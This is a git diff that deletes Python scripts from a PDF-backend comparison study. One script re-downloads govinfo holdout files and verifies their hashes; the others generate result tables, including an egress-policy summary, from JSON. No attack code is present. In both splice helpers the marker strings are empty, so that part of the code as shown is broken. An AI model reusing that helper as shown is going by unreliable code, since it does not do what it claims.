-import sys -from pathlib import Path - -import httpx - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -MEMBERSHIP = REPO / "docs/research/pdf-backend-bakeoff/results/holdout_membership.json" -HOLDOUT_DIR = REPO / "docs/research/pdf-backend-bakeoff/holdout" -CONTENT = "https://www.govinfo.gov/content/pkg" - - -def wanted() -> list[tuple[str, str, Path, str, int]]: - """(pkg, fmt, destination, expected sha256, expected bytes) for all 88 files.""" - doc = json.loads(MEMBERSHIP.read_text()) - out = [] - for m in doc["members"]: - for v in m["versions"]: - for fmt in ("xml", "pdf"): - rec = v[fmt] - out.append((v["pkg"], fmt, HOLDOUT_DIR / rec["path"], rec["sha256"], rec["bytes"])) - return out - - -def main() -> int: - ap = argparse.ArgumentParser() - ap.add_argument( - "--verify-only", - action="store_true", - help="check what is on disk and download nothing", - ) - args = ap.parse_args() - - files = wanted() - client = ( - None - if args.verify_only - else httpx.Client(headers={"User-Agent": "DeltaTrack-bakeoff-holdout/1.0"}, timeout=300) - ) - ok = fetched = 0 - problems: list[str] = [] - - for pkg, fmt, dest, sha, nbytes in files: - rel = dest.relative_to(HOLDOUT_DIR) - if dest.exists() and hashlib.sha256(dest.read_bytes()).hexdigest() == sha: - ok += 1 - continue - if args.verify_only: - problems.append(f"{rel}: {'absent' if not dest.exists() else 'sha256 mismatch'}") - continue - url = f"{CONTENT}/{pkg}/{fmt}/{pkg}.{fmt}" - try: - r = client.get(url, follow_redirects=True) - r.raise_for_status() - except Exception as exc: # noqa: BLE001 - problems.append(f"{rel}: fetch failed ({type(exc).__name__}: {exc}) from {url}") - continue - got = hashlib.sha256(r.content).hexdigest() - if got != sha: - # Not written. A re-issued package is a finding about govinfo, not an input. - problems.append( - f"{rel}: sha256 mismatch from {url}\n" - f" frozen {sha} ({nbytes} bytes)\n" - f" fetched {got} ({len(r.content)} bytes)" - ) - continue - dest.parent.mkdir(parents=True, exist_ok=True) - dest.write_bytes(r.content) - ok += 1 - fetched += 1 - print(f" fetched {rel}", file=sys.stderr) - - print(f"\n{ok}/{len(files)} files present and hash-correct ({fetched} downloaded)", file=sys.stderr) - if problems: - print(f"\n{len(problems)} PROBLEM(S) -- the holdout is NOT restored:", file=sys.stderr) - for p in problems: - print(f" {p}", file=sys.stderr) - return 1 - return 0 - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py b/docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py deleted file mode 100644 index d7174641..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py +++ /dev/null @@ -1,294 +0,0 @@ -"""Generate every table in RESULTS-CONFIRMATORY.md from the raw result JSON. - -Same splice-between-markers discipline as fill_results.py: no number in the published -document is transcribed by hand. If a table is missing here, it does not belong in the -document. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py -""" - -from __future__ import annotations - -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -BAKEOFF = REPO / "docs/research/pdf-backend-bakeoff" -RESULTS = BAKEOFF / "results" -DOC = BAKEOFF / "RESULTS-CONFIRMATORY.md" - -CAND = ("pdfium-wasm", "pdfminer") - - -def load(name: str) -> dict | None: - p = RESULTS / name - return json.loads(p.read_text()) if p.exists() else None - - -def splice(text: str, marker: str, block: str) -> str: - start, end = f"", f"" - if start not in text: - return text - head, rest = text.split(start, 1) - tail = rest.split(end, 1)[1] if end in rest else rest - return f"{head}{start}\n\n{block}\n\n{end}{tail}" - - -# ---------- Concern A --------------------------------------------------------- - - -def migration_table(data: dict) -> str: - pairs = data["pairs"] - accepted, declined = [], [] - for key, e in pairs.items(): - prim = e.get("repaired", {}) - dec = (prim.get(data["incumbent"], {}) or {}).get("production_declined") or [] - (declined if dec else accepted).append((key, e)) - - out = [ - f"**Primary mode `repaired`. {len(accepted)} production-accepted pairs are the migration " - f"gate; {len(declined)} production-declined pairs are diagnostics and decide nothing.**", - "", - "| | " + " | ".join(CAND) + " |", - "|---|" + "---|" * len(CAND), - ] - - def tally(rows, field): - cells = [] - for b in CAND: - ok = sum(1 for _k, e in rows if e.get("repaired", {}).get(b, {}).get(field) is True) - n = sum(1 for _k, e in rows if b in e.get("repaired", {})) - cells.append(f"**{ok}/{n}**" if ok == n and n else f"{ok}/{n}") - return cells - - na, nd = len(accepted), len(declined) - for label, field, rows in ( - (f"A1 amounts identical ({na} accepted)", "A1_amounts_identical", accepted), - (f"A2 changes identical ({na} accepted)", "A2_changes_identical", accepted), - (f"A4 full text identical ({na} accepted)", "A4_text_identical", accepted), - (f"A5 line numbers identical ({na} accepted)", "A5_line_numbers_identical", accepted), - (f"A1 amounts identical ({nd} declined, diagnostic)", "A1_amounts_identical", declined), - (f"A2 changes identical ({nd} declined, diagnostic)", "A2_changes_identical", declined), - ): - out.append(f"| {label} | " + " | ".join(tally(rows, field)) + " |") - - # A pair with zero amount entries on BOTH sides passes A1 vacuously: there is no - # multiset to break, so neither the candidate's pass nor the control's failure to break - # it carries information. Substantive pairs are counted separately, because "13/13 - # identical" reads as thirteen pieces of evidence when three of them are empty. - def substantive(rows, key): - return [(k, e) for k, e in rows if (e.get("repaired", {}).get("pdfium-native", {}) or {}).get(key, 0) > 0] - - sub_amt = substantive(accepted, "n_amount_entries") - sub_chg = substantive(accepted, "n_changes") - out += [ - "", - f"**Evidential content.** {len(sub_amt)} of the {len(accepted)} accepted pairs carry any " - f"amount entries at all; the rest pass A1 vacuously (empty multiset on both sides) and are " - f"not evidence of amount parity in either direction. {len(sub_chg)} carry any changes.", - "", - "**B0 controls — each must FAIL its own gate, and can only do so where the gate has content.**", - "", - "| control | gate | broke the gate | on content-bearing pairs | verdict |", - "|---|---|---|---|---|", - ] - ctl = { - "SA1": ("A1_amounts_identical", sub_amt), - "SA2": ("A2_changes_identical", sub_chg), - "SA3": ("A4_text_identical", accepted), - } - for sid, (field, rows) in ctl.items(): - failed_all = sum(1 for _k, e in accepted if e.get("repaired", {}).get(sid, {}).get(field) is False) - n_all = sum(1 for _k, e in accepted if sid in e.get("repaired", {})) - failed_sub = sum(1 for _k, e in rows if e.get("repaired", {}).get(sid, {}).get(field) is False) - n_sub = len(rows) - gate = field.split("_")[0] - ok = failed_sub == n_sub and n_sub - verdict = "**live**" if ok else f"**UNPROVEN on {n_sub - failed_sub} content-bearing pair(s)**" - out.append(f"| {sid} | {gate} | {failed_all}/{n_all} | {failed_sub}/{n_sub} | {verdict} |") - return "\n".join(out) - - -# ---------- Concern B --------------------------------------------------------- - - -def b_delta_table(rep: dict) -> str: - out = [ - f"Δ = score(pdfminer) − score(pdfium-wasm); positive favours pdfminer. " - f"{rep['resamples']:,} paired cluster resamples by bill, seed {rep['seed']}, `{rep['mode']}` mode.", - "", - "| metric | pdfium-wasm | pdfminer | Δ | 95% CI | practical δ | verdict |", - "|---|---|---|---|---|---|---|", - ] - for m, s in rep["delta"].items(): - if s.get("point") is None: - out.append(f"| {m} | | | | | {s.get('threshold')} | insufficient data |") - continue - pw = rep["means"]["pdfium-wasm"].get(m) - pm = rep["means"]["pdfminer"].get(m) - ci = f"[{s['ci'][0]:+.4f}, {s['ci'][1]:+.4f}]" - out.append( - f"| {m} | {pw if pw is None else f'{pw:.4f}'} | {pm if pm is None else f'{pm:.4f}'} | " - f"{s['point']:+.4f} | {ci} | {s['threshold']} | {s['verdict']} |" - ) - return "\n".join(out) - - -def b0_table(rep: dict) -> str: - out = [ - "**Every metric's own control, reported beside it. A Δ without its control row is not reviewable.**", - "", - "| metric | control | Δ from sabotage | practical δ | verdict |", - "|---|---|---|---|---|", - ] - for m, r in rep["B0"].items(): - d = "n/a" if r.get("delta") is None else f"{r['delta']:+.4f}" - out.append( - f"| {m} | {r['control']} | {d} | {r.get('threshold', '')} | " - f"{'fires' if r['fires'] else '**did not fire — metric VOID**'} |" - ) - out += ["", "| separability | own metric | B2 | verdict |", "|---|---|---|---|"] - for r in rep["separability"]: - if r.get("verdict") == "insufficient data": - out.append(f"| {r['control']} | | | insufficient data |") - continue - out.append( - f"| {r['control']} | {r['own_metric']} {r['own_delta']:+.4f} | " - f"{r['other_delta']:+.4f} | **{r['verdict']}** |" - ) - return "\n".join(out) - - -# ---------- Concern C --------------------------------------------------------- - - -def egress_table(data: dict) -> str: - s = data["summary"] - out = [ - f"Policy under test: `{data['policy']}`", - "", - f"Of **{data['n_vectors_frozen']} frozen mechanisms**, {s['eligible']} transmitted in the " - f"no-policy control and are eligible for scoring. **{s['blocked']} blocked**, " - f"**{len(s['bypasses_policy'])} bypass the policy**, " - f"**{len(s['outside_csp'])} are outside what CSP governs** " - f"({', '.join(s['outside_csp']) or 'none'}). " - f"{len(s['not_scored'])} never transmitted in the control and are not scored " - f"({', '.join(s['not_scored'])}).", - "", - "| vector | control | policy result |", - "|---|---|---|", - ] - for r in data["table"]: - out.append(f"| `{r['vector']}` | {r['control']} | {r['policy_result']} |") - out += ["", "| validity condition | holds |", "|---|---|"] - for k, v in data["validity"].items(): - out.append(f"| {k} | {'yes' if v else '**NO — run void**'} |") - return "\n".join(out) - - -def isolation_table(data: dict) -> str: - out = ["| check | result |", "|---|---|"] - for k, v in data["checks"].items(): - out.append(f"| {k} | {'**PASS**' if v else '**FAIL**'} |") - out += [ - "", - f"Verdict: **{data['verdict']}**. Linux container: {data['linux_container']}.", - ] - return "\n".join(out) - - -# ---------- Concern E --------------------------------------------------------- - - -def bundle_table(data: dict) -> str: - def mb(n): - return f"{n / 1e6:.2f} MB" - - base = data["baseline"] - out = [ - f"Unit: {data['unit']}.", - "", - f"Shared Pyodide + DeltaTrack baseline: **{mb(base['wire'])}** over the wire ({mb(base['bytes'])} raw).", - "", - "| artifact | incremental backend cost | full artifact |", - "|---|---|---|", - ] - for name, t in data["backends"].items(): - out.append(f"| {name} | **{mb(t['wire'])}** | {mb(t['artifact_wire'])} |") - a = data["backends"]["pdfium-wasm"]["wire"] - for name, t in data["backends"].items(): - if name == "pdfium-wasm": - continue - out.append("") - out.append(f"`{name}` is **{t['wire'] / a:.2f}×** PDFium-WASM's incremental cost.") - return "\n".join(out) - - -# ---------- Concern D --------------------------------------------------------- - - -def perf_table(data: dict) -> str: - out = [] - if data.get("void"): - out += [ - f"> **THIS RUN IS VOID.** {data['void_reason']}: load average " - f"{data['load_average_start'][0]:.2f} against a ceiling of {data['load_ceiling']}. " - "The numbers are published as void rather than withheld, and no gate verdict below " - "counts. The exploratory gate-9 figure that failed to reproduce was measured under " - "exactly this condition, undeclared.", - "", - ] - out += [ - f"Document: `{data['document']}`. Estimator: {data['estimator']} of {data['trials']}.", - "", - "| backend | min | median | max | spread | cpu/wall at min | D1 | D2 |", - "|---|---|---|---|---|---|---|---|", - ] - for b, e in data["backends"].items(): - if "min_s" not in e: - out.append(f"| {b} | — | — | — | — | — | {e.get('error', 'error')} | |") - continue - out.append( - f"| {b} | {e['min_s']:.2f} s | {e['median_s']:.2f} s | {e['max_s']:.2f} s | " - f"{e['spread_s']:.2f} s | {e['cpu_wall_ratio_at_min']} | {e['D1']} | {e.get('D2', '—')} |" - ) - return "\n".join(out) - - -def main() -> None: - if not DOC.exists(): - print(f"no {DOC.name} yet — nothing to fill", file=sys.stderr) - return - doc = DOC.read_text() - filled = [] - - for name, marker, fn in ( - ("migration_p1.json", "A_P1", migration_table), - ("migration_p2.json", "A_P2", migration_table), - ("confirm_p1_report_strict.json", "B_P1_DELTA", b_delta_table), - ("confirm_p1_report_strict.json", "B_P1_B0", b0_table), - ("confirm_p2_report_strict.json", "B_P2_DELTA", b_delta_table), - ("confirm_p2_report_strict.json", "B_P2_B0", b0_table), - ("confirm_egress.json", "C_EGRESS", egress_table), - ("confirm_isolation.json", "C_ISOLATION", isolation_table), - ("confirm_bundle.json", "E_BUNDLE", bundle_table), - ("confirm_perf.json", "D_PERF", perf_table), - ): - data = load(name) - if data is None: - print(f" skip {marker}: {name} absent", file=sys.stderr) - continue - try: - doc = splice(doc, marker, fn(data)) - filled.append(marker) - except Exception as exc: # noqa: BLE001 - print(f" FAIL {marker}: {type(exc).__name__}: {exc}", file=sys.stderr) - - DOC.write_text(doc) - print(f"filled: {', '.join(filled) or 'nothing'}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py deleted file mode 100644 index e8f8448a..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py +++ /dev/null @@ -1,496 +0,0 @@ -"""Generate every table in RESULTS-HYBRID.md from the raw result JSON. - -Same splice-between-markers discipline as fill_results.py and fill_confirmatory.py: no -number in the published document is transcribed by hand. A table that is not generated -here does not belong in the document. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py -""" - -from __future__ import annotations - -import json -import statistics -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -BAKEOFF = REPO / "docs/research/pdf-backend-bakeoff" -RESULTS = BAKEOFF / "results" -DOC = BAKEOFF / "RESULTS-HYBRID.md" - -PATHS = ("glyph", "hybrid", "pdfminer") -TARGETS = ("FAMILY HOUSING", "NAVY AND", "ARMY NATIONAL", "AMERICAN BATTLE") - - -def load(name: str): - p = RESULTS / name - return json.loads(p.read_text()) if p.exists() else None - - -def splice(text: str, marker: str, block: str) -> str: - start, end = f"", f"" - if start not in text: - return text - head, rest = text.split(start, 1) - tail = rest.split(end, 1)[1] if end in rest else rest - return f"{head}{start}\n\n{block}\n\n{end}{tail}" - - -def missing(what: str) -> str: - return f"_(not generated: `{what}` is absent from `results/`. Run the probe, then re-run `fill_hybrid.py`.)_" - - -# ---------- the four named headings ------------------------------------------- - - -def headings_table(data: dict) -> str: - out = [ - "| document | heading | production | glyph | **hybrid** | pdfminer |", - "|---|---|---|---|---|---|", - ] - for doc, per in data.items(): - for target in TARGETS: - cells = [] - for path in ("production", "glyph", "hybrid", "pdfminer"): - o = per.get(target, {}).get(path) - if o is None: - cells.append("—") - continue - cell = f"{o['correct']} ok" - if o["corrupted"]: - cell = f"**{o['correct']} ok / {o['corrupted']} malformed**" - cells.append(cell) - out.append(f"| `{doc}` | {target} | " + " | ".join(cells) + " |") - tot = {p: [0, 0] for p in ("production", "glyph", "hybrid", "pdfminer")} - for per in data.values(): - for target in TARGETS: - for path, o in per.get(target, {}).items(): - tot[path][0] += o["correct"] - tot[path][1] += o["corrupted"] - out.append( - "| **all** | **all four** | " - + " | ".join( - f"{v[0]} ok / {v[1]} malformed" for v in (tot[p] for p in ("production", "glyph", "hybrid", "pdfminer")) - ) - + " |" - ) - return "\n".join(out) - - -# ---------- separability ------------------------------------------------------ - - -def separability_table(data: dict) -> str: - out = [ - "| document | word boundaries | intra-word | boundary gap/size min | intra-word max | separable | " - "best threshold, errors | shipped 0.25, errors |", - "|---|---|---|---|---|---|---|---|", - ] - for path, s in data.items(): - if s is None: - continue - name = "**POOLED**" if path == "__pooled__" else f"`{Path(path).name}`" - out.append( - f"| {name} | {s['word_boundaries']} | {s['intra_word']} | {s['boundary_ratio_min']} | " - f"{s['intra_ratio_max']} | **{'yes' if s['separable'] else 'NO'}** | " - f"{s['best_threshold']}, {s['best_threshold_errors']} | " - f"{s['shipped_0.25_missed_spaces']} missed + {s['shipped_0.25_spurious_spaces']} spurious |" - ) - return "\n".join(out) - - -# ---------- corpus parity ----------------------------------------------------- - - -def _mean(vals): - vals = [v for v in vals if v is not None] - return round(statistics.mean(vals), 5) if vals else None - - -def corpus_table(data: dict) -> str: - docs = [d for d in data["documents"] if "vs_production" in d] - scored = [d for d in docs if not d.get("production_declined")] - heading_docs = [d for d in scored if any(r["H2_labels_reference"] > 0 for r in d["vs_production"].values())] - rows = [] - for path in PATHS: - e = [d["vs_production"][path] for d in scored if path in d["vs_production"]] - h = [d["vs_production"][path] for d in heading_docs if path in d["vs_production"]] - rows.append( - { - "path": path, - "n": len(e), - "text_identical": sum(1 for r in e if r["H1_text_identical"]), - "text_f1": _mean([r["H1_token_f1"] for r in e]), - "n_head": len(h), - "labels_exact": sum(1 for r in h if r["H2_labels_exact"]), - "labels_absent": sum(r["H2_absent_from_reference"] for r in h), - "labels_missed": sum(r["H2_missed_from_reference"] for r in h), - "breadcrumb": _mean([r["H3_breadcrumb_accuracy"] for r in h]), - "lines_identical": sum(1 for r in e if r["H4_line_numbers_identical"]), - "lines_jaccard": _mean([r["H4_line_numbers_jaccard"] for r in e]), - "assoc": _mean([r["H5_assoc_accuracy"] for r in h]), - } - ) - out = [ - f"Reference is **production** (`extract_clean_pages`) on the {len(scored)} corpus documents " - f"production accepts. Heading metrics (H2/H3/H5) are over the {rows[0]['n_head']} of those " - "that carry any heading; the rest cannot discriminate.", - "", - "| metric | " + " | ".join(f"**{p}**" if p == "hybrid" else p for p in PATHS) + " |", - "|---|" + "---|" * len(PATHS), - ] - - def row(label, key, fmt="{}"): - return f"| {label} | " + " | ".join(fmt.format(r[key]) for r in rows) + " |" - - out += [ - "| H1 full text digest identical | " + " | ".join(f"{r['text_identical']}/{r['n']}" for r in rows) + " |", - row("H1 mean token F1 vs production", "text_f1"), - "| H2 heading-label set exact | " + " | ".join(f"{r['labels_exact']}/{r['n_head']}" for r in rows) + " |", - row("H2 labels production does NOT produce", "labels_absent"), - row("H2 production labels missed", "labels_missed"), - row("H3 breadcrumb (parent) agreement", "breadcrumb"), - "| H4 line-number set identical | " + " | ".join(f"{r['lines_identical']}/{r['n']}" for r in rows) + " |", - row("H4 mean line-number Jaccard", "lines_jaccard"), - row("H5 amount→heading agreement", "assoc"), - ] - return "\n".join(out) - - -def accuracy_table(data: dict) -> str: - """The same paths against XML, so parity is not mistaken for correctness. - - Reported in TWO STRATA, and the split is not cosmetic. `RESULTS-CONFIRMATORY.md` - recorded that every corpus document where the paths' heading recovery differs carries a - ``, which the DeltaTrack#11 parser defect drops from the XML reference. - Excluding those documents therefore removes exactly the documents that can - discriminate, and one pooled figure over the remainder reads as "all paths are - equivalent" when what it says is "these documents cannot tell them apart." - - Each stratum carries a generated `can this stratum discriminate?` row, derived from - whether any path differs from production on labels inside it. A stratum answering NO is - published and is not evidence. - """ - cols = ("production",) + PATHS - accepted = [d for d in data["documents"] if "vs_xml" in d and not d.get("production_declined")] - strata = ( - ("primary — no ``", [d for d in accepted if not d.get("quoted_block")]), - ("quoted-block stratum", [d for d in accepted if d.get("quoted_block")]), - ) - out = [ - "Reference is **XML**. `production` is a fourth column rather than the reference, because " - "against XML it is a candidate like any other.", - ] - for name, docs in strata: - differs = sum( - 1 - for d in docs - if any( - r["H2_absent_from_reference"] or r["H2_missed_from_reference"] - for r in (d.get("vs_production") or {}).values() - ) - ) - verdict = ( - f"**YES** — {differs} of {len(docs)} documents separate the paths" - if differs - else f"**NO** — no path differs from production anywhere in these {len(docs)}" - ) - out += [ - "", - f"**{name}** — {len(docs)} documents. _Can this stratum discriminate?_ {verdict}", - "", - "| metric | " + " | ".join(f"**{p}**" if p == "hybrid" else p for p in cols) + " |", - "|---|" + "---|" * len(cols), - ] - for label, metric, field in ( - ("B2 heading-label F1", "B2", "f1"), - ("B5 amount→heading F1", "B5", "f1"), - ("B6 parent/child accuracy", "B6", "accuracy"), - ): - cells = [ - str(_mean([d["vs_xml"][p][metric].get(field) for d in docs if p in d.get("vs_xml", {})])) for p in cols - ] - out.append(f"| {label} | " + " | ".join(cells) + " |") - return "\n".join(out) - - -def pairs_table(data: dict) -> str: - pairs = [p for p in data["pairs"] if "vs_production" in p] - out = [ - f"Reference is **production**'s canonical diff over {len(pairs)} consecutive version pairs. " - "`amounts` is the `Counter[(old, new, kind)]` of `amount_entries` — the money, and the " - "highest-consequence field. `changes` is the `Counter[(change_type, norm(old), norm(new))]` " - "signature set, which embeds the line text and therefore cannot be byte-identical for any " - "path that assembles lines geometrically; its **overlap** is the informative figure and the " - "identity column is reported only so the distinction is visible.", - "", - "| path | amount signatures identical | amount recall | change signatures identical | change recall |", - "|---|---|---|---|---|", - ] - ref_amt = sum(p.get("n_amount_entries_production", 0) for p in pairs) - ref_chg = sum(p.get("n_changes_production", 0) for p in pairs) - for path in PATHS: - e = [p["vs_production"][path] for p in pairs if path in p["vs_production"]] - if not e: - continue - a = sum(1 for r in e if r["H6_amounts_identical"]) - c = sum(1 for r in e if r["H6_changes_identical"]) - ao = sum(r["H6_amount_overlap"] for r in e) - co = sum(r["H6_change_overlap"] for r in e) - name = f"**{path}**" if path == "hybrid" else path - out.append( - f"| {name} | {a}/{len(e)} | {round(ao / ref_amt, 5) if ref_amt else '—'} ({ao}/{ref_amt}) | " - f"{c}/{len(e)} | {round(co / ref_chg, 5) if ref_chg else '—'} ({co}/{ref_chg}) |" - ) - return "\n".join(out) - - -def signals_table(data: dict) -> str: - out = [ - "| document | generated chars | with a real box | with a size | with a font name | missing origin | " - "glyph_size coverage | LineGeom coverage | margin/body font separation |", - "|---|---|---|---|---|---|---|---|---|", - ] - for path, e in data.items(): - s1, s2, s3 = e["S1"], e["S2"], e["S3"] - rate = f"{s1['chars_generated']}/{s1['chars_total']} ({s1['generated_rate']:.1%})" - sep = s3["separation_rate"] - sep_cell = f"{sep} over {s3['numbered_lines_with_both']} lines" if sep is not None else "—" - out.append( - f"| `{Path(path).name}` | {rate} | **{s1['generated_with_real_box']}** | " - f"**{s1['generated_with_size']}** | **{s1['generated_with_font_name']}** | " - f"**{s1['generated_missing_origin']}** | {s2['size_coverage']} ({s2['numbered_lines']} lines) | " - f"{s2['geom_coverage']} | {sep_cell} |" - ) - return "\n".join(out) - - -def normalize_raw_scope_table(data: dict) -> str: - """Where the dangling-hyphen gap lives, over a mixed stratum. - - The point of this table is the dichotomy, not the totals: the mid-line branch either - barely fires (numbered layouts, where the two paths agree exactly) or fires in the - thousands (unnumbered layouts, where they diverge). A pooled figure would average the - two into a middling rate that describes neither. - """ - out = [ - "The same probe over a **mixed** stratum, to locate the limitation rather than " - "just measure it. `declined` is production's own unnumbered-layout guard.", - "", - "| document | production declines it | mid-line branch fired | trailing-hyphen tokens (prod / hybrid) | " - "hyphenated tokens only in hybrid |", - "|---|---|---|---|---|", - ] - for r in data["documents"]: - b, d, dec = r["branch_fired"], r["diff"], r["production_declined"] - agree = d["trailing_hyphen_production"] == d["trailing_hyphen_hybrid"] and not d["hyphenated_only_in_hybrid"] - out.append( - f"| `{r['doc']}` | {'**yes**' if dec else 'no'} | {b['midline_hyphen_lowercase']:,} | " - f"{d['trailing_hyphen_production']} / {d['trailing_hyphen_hybrid']}" - f"{' — **identical**' if agree else ''} | {d['hyphenated_only_in_hybrid']} |" - ) - return "\n".join(out) - - -def geometry_agreement_table(data: dict) -> str: - """Do the sidecar VALUES match production's, not merely exist?""" - out = [ - "Agreement is over the numbered lines both paths recovered, to a 0.05 pt tolerance " - "(these are floats derived through different call paths, so exact equality would " - "report noise as disagreement).", - "", - "| document | shared numbered lines | `glyph_size` | `content_left` | `content_right` | `first_word_right` |", - "|---|---|---|---|---|---|", - ] - for path, e in data.items(): - s = e.get("S4") - if not s: - continue - out.append( - f"| `{Path(path).name}` | {s['lines_shared']} | {s['glyph_size_agree']} | " - f"{s['content_left_agree']} | {s['content_right_agree']} | **{s['first_word_right_agree']}** |" - ) - return "\n".join(out) - - -def portability_table(data: dict) -> str: - out = [ - "| document | raw stream identical | trailing-space divergences | line-break-vs-space | " - "**unclassified** | **page text digest identical** | line numbers identical | heading labels identical |", - "|---|---|---|---|---|---|---|---|", - ] - for path, e in data.items(): - k = e["stream_diff_kinds"] - out.append( - f"| `{Path(path).name}` | {e['stream_identical']} | {k['line_trailing_space']} | " - f"{k['line_break_vs_space']} | **{k['unclassified']}** | **{e['pages_text_identical']}** | " - f"{e['pages_line_numbers_identical']} ({e['n_line_numbers']}) | " - f"{e['pages_labels_identical']} ({e['n_labels']}) |" - ) - return "\n".join(out) - - -def wasm_table(data: dict) -> str: - present = data["entry_points_present"] - out = [ - f"`@embedpdf/pdfium` **{data['wrapper_version']}**, called for real on a GPO bill page " - f"({data['count_chars']} characters). Presence is asked of the wrapper object an adapter would " - "call, and each function is then invoked on every character so an exported stub cannot pass.", - "", - "| entry point | exported | exercised |", - "|---|---|---|", - ] - ex = data["exercised"] - hits = { - "FPDFText_GetCharBox": ex["charbox"], - "FPDFText_GetMatrix": ex["matrix"], - "FPDFText_GetCharOrigin": ex["origin"], - "FPDFText_IsGenerated": ex["generated"], - "FPDFText_IsHyphen": ex["hyphen"], - "FPDFText_GetFontInfo": ex["fontinfo"], - "FPDFText_HasUnicodeMapError": ex["maperror"], - } - for name, ok in present.items(): - n = hits.get(name) - note = f"{n} non-trivial returns" if n is not None else "called" - out.append(f"| `{name}` | {'yes' if ok else '**NO**'} | {note} |") - out.append("") - out.append(f"**All {len(present)} required entry points present: {data['all_present']}.**") - return "\n".join(out) - - -def backend_spacing_table(data: dict) -> str: - out = [ - f"Probe boundary: `{data['probe_text']}` on `{data['pdf']}` page {data['page']}. The neutral " - f"glyph layer produces `{data['probe_text'].replace(' ', '')}` here.", - "", - "| backend | its own text keeps the space | produces the joined form | how a synthesised character is marked |", - "|---|---|---|---|", - ] - for name, r in data["backends"].items(): - if "error" in r: - out.append(f"| {name} | — | — | ERROR: {r['error'][:60]} |") - continue - out.append( - f"| {name} | **{r['recovers_space']}** | **{r['produces_joined_form']}** | {r['generated_marker']} |" - ) - out.append("| **the glyph seam** | **False** | **True** | n/a — the information is discarded before this point |") - return "\n".join(out) - - -def adapter_table(data: dict) -> str: - """Corpus-scale totals from the adapter's own counters. - - These are the claims the contract rests on, each stated as a count that can be - non-zero: an index skew would mean the char index does not address both the character - and its geometry; unnamed ink would mean the stream lost a glyph; a unicode map error - would mean a character PDFium could not name at all. - """ - keys = ( - ("pages", "pages"), - ("chars", "characters"), - ("generated_chars", "engine-generated characters"), - ("hyphen_chars", "`FPDFText_IsHyphen` characters"), - ("index_skew_pages", "**pages where CountChars != len(text)**"), - ("unnamed_ink", "**ink the engine could not name**"), - ("unicode_map_errors", "**unicode map errors**"), - # Counted in the non-generated branch only. A generated character has no font name - # by construction, and folding those in would make the row unreadable. - ("empty_font_names", "**non-generated characters with an empty font name**"), - ) - tot = dict.fromkeys((k for k, _ in keys), 0) - n = 0 - for d in data["documents"]: - s = (d.get("extract") or {}).get("hybrid") - if not s: - continue - n += 1 - for k in tot: - tot[k] += s.get(k, 0) - out = [ - f"Counters from the hybrid adapter itself, aggregated over all {n} corpus documents.", - "", - "| | total |", - "|---|---|", - ] - for k, label in keys: - out.append(f"| {label} | {tot[k]:,} |") - if tot["chars"]: - out.append(f"| generated-character rate | {tot['generated_chars'] / tot['chars']:.2%} |") - return "\n".join(out) - - -def normalize_raw_table(data: dict) -> str: - """Whether `normalize_raw`'s branches repair damage the hybrid path still has. - - Each row is a document where the branches fire, with the token-level artifacts the - branches exist to prevent. Non-zero `hyphen artifacts` on a document where the - mid-line branch fires would falsify section 8's claim. - """ - rows = data["documents"] - out = [ - "Measured on the **production-declined** stratum — the unnumbered layouts, mostly " - "enrolled bills, which section 5's parity table excludes and which are exactly where " - "`normalize_raw`'s mid-line soft-hyphen branch exists to act (its docstring names them). " - "A branch counts as having fired by matching its own pattern against PDFium's raw page " - "text, so the zeros to its right are only meaningful because the number to its left is " - "large.", - "", - "| document | mid-line branch fired | trailing-hyphen tokens (prod / hybrid) | " - "soft-hyphen chars in text (prod / hybrid) | hyphenated tokens only in hybrid |", - "|---|---|---|---|---|", - ] - tot = {k: 0 for k in ("fired", "th_p", "th_h", "sh_p", "sh_h", "only_h")} - for r in rows: - b, d = r["branch_fired"], r["diff"] - tot["fired"] += b["midline_hyphen_lowercase"] - tot["th_p"] += d["trailing_hyphen_production"] - tot["th_h"] += d["trailing_hyphen_hybrid"] - tot["sh_p"] += d["soft_hyphen_chars_production"] - tot["sh_h"] += d["soft_hyphen_chars_hybrid"] - tot["only_h"] += d["hyphenated_only_in_hybrid"] - out.append( - f"| `{r['doc']}` | {b['midline_hyphen_lowercase']:,} | " - f"{d['trailing_hyphen_production']} / {d['trailing_hyphen_hybrid']} | " - f"{d['soft_hyphen_chars_production']} / {d['soft_hyphen_chars_hybrid']} | " - f"**{d['hyphenated_only_in_hybrid']}** |" - ) - out.append( - f"| **total** | **{tot['fired']:,}** | {tot['th_p']} / {tot['th_h']} | " - f"{tot['sh_p']} / {tot['sh_h']} | **{tot['only_h']}** |" - ) - samples = [s for r in rows for s in r["diff"]["samples_only_in_hybrid"]] - if samples: - out += ["", "Hyphenated tokens the hybrid produces and production does not:", ""] - out += [f"- `{s}`" for s in samples[:20]] - return "\n".join(out) - - -def main() -> None: - text = DOC.read_text() - jobs = [ - ("H_ADAPTER", "hybrid_docs.json", adapter_table), - ("H_NORMALIZE_RAW", "probe_normalize_raw.json", normalize_raw_table), - ("H_NORMALIZE_RAW_SCOPE", "probe_normalize_raw_all.json", normalize_raw_scope_table), - ("H_BACKEND_SPACING", "probe_backend_spacing.json", backend_spacing_table), - ("H_HEADINGS", "probe_failure_headings.json", headings_table), - ("H_SEPARABILITY", "probe_separability.json", separability_table), - ("H_CORPUS", "hybrid_docs.json", corpus_table), - ("H_ACCURACY", "hybrid_docs.json", accuracy_table), - ("H_PAIRS", "hybrid_pairs.json", pairs_table), - ("H_SIGNALS", "probe_hybrid_signals.json", signals_table), - ("H_GEOM_AGREE", "probe_hybrid_signals.json", geometry_agreement_table), - ("H_PORTABILITY", "hybrid_portability.json", portability_table), - ("H_WASM", "hybrid_wasm_entrypoints.json", wasm_table), - ] - for marker, source, fn in jobs: - data = load(source) - block = fn(data) if data else missing(source) - text = splice(text, marker, block) - 